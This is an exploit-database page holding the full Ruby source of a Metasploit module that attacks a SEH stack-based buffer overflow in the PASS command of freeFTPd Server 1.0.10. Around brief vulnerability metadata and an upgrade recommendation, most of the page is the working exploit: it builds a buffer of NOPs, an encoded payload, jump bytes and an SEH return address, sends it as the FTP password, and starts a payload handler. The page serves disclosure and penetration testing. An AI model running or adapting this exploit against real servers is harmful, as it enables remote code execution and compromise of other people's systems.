header-logo
Suggest Exploit
vendor:
freeFTPd Server
by:
Wireghoul and Muhamad Fadzil Ramli
N/A
CVSS
N/A
SEH Stack-Based Buffer Overflow
119
CWE
Product Name: freeFTPd Server
Affected Version From: 1.0.10
Affected Version To: 1.0.10
Patch Exists: YES
Related CWE: N/A
CPE: a:freeftpd:freeftpd:1.0.10
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP English SP3
2013

freeFTPd 1.0.10 PASS Command SEH Overflow

This module exploits a SEH stack-based buffer overflow in freeFTPd Server PASS command version 1.0.10. credit goes to Wireghoul.

Mitigation:

Upgrade to the latest version of freeFTPd Server
Source

Exploit-DB raw data:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'freeFTPd 1.0.10 PASS Command SEH Overflow',
			'Description'    => %q{
					This module exploits a SEH stack-based buffer overflow in freeFTPd Server PASS command version 1.0.10.
				credit goes to Wireghoul.

			},
			'Author'         =>
				[
					'Wireghoul - www.justanotherhacker.com', # original poc
					'Muhamad Fadzil Ramli <fadzil [at] motivsolution.asia>', # metasploit module
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'OSVDB', '96517' ],
					[ 'EDB', '27747' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh'
				},
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x20\x0a\x0d",
					#'DisableNops' => true
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP English SP3',   { 'Ret' => 0x00414226 , 'Offset' => 952 } ],
				],
			'DisclosureDate' => 'Aug 21 2013',
			'DefaultTarget' => 0))
	end

	def check
		connect
		disconnect

		if (banner =~ /freeFTPd 1.0/)
			return Exploit::CheckCode::Vulnerable
		end
		Exploit::CheckCode::Safe
	end

	def exploit
		connect

        payload_size = payload.encoded.length

        buf = make_nops(1000)
        buf[(target['Offset']-11) - payload_size, payload_size] = payload.encoded
        buf[target['Offset']-5,5] = "\xe9\x98\xfe\xff\xff"
        buf[target['Offset'],4]   = [0xfffff9eb].pack("V")
        buf[target['Offset']+4,4] = [target.ret].pack("V")

		print_status("Sending exploit buffer...")

        #buffer = Rex::Text.pattern_create(1000)
        send_user(datastore['FTPUSER'])
        send_pass(buf)

		handler
		disconnect
	end

end

Navigation

Suggest Exploit

Services By CQR